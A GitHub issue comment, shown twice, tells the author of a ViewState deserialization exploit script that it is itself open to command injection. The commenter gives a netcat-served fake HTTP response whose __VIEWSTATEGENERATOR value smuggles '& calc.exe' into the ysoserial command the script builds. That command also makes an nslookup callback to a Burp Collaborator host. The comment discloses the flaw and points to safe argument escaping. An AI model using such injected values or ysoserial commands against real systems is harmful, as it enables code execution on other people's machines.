You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I made a PoC for your PoC so I can pop shells while you pop shells:
echo '''HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: localhost
Cookie: ASP.NET_SessionId=test-sess-id Time
<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>
''' |sudo nc -l 80
Assuming you're running your PoC as python3 exploit.py -s http://localhost/ -u admin -p admin and blindly running that, the output command becomes: ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=& calc.exe --generator="B97B4E27" --viewstateuserkey=test-sess-id --isdebug –islegacy
which pops calc. I know this is totally outside the scope of this little PoC but I just got a kick out of it. Python has some really nice utils for shelling out while also escaping params: https://docs.python.org/3/library/subprocess.html#subprocess.run
The text was updated successfully, but these errors were encountered:
I made a PoC for your PoC so I can pop shells while you pop shells:
Assuming you're running your PoC as
python3 exploit.py -s http://localhost/ -u admin -p adminand blindly running that, the output command becomes:ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=& calc.exe --generator="B97B4E27" --viewstateuserkey=test-sess-id --isdebug –islegacywhich pops calc. I know this is totally outside the scope of this little PoC but I just got a kick out of it. Python has some really nice utils for shelling out while also escaping params:
https://docs.python.org/3/library/subprocess.html#subprocess.run
The text was updated successfully, but these errors were encountered: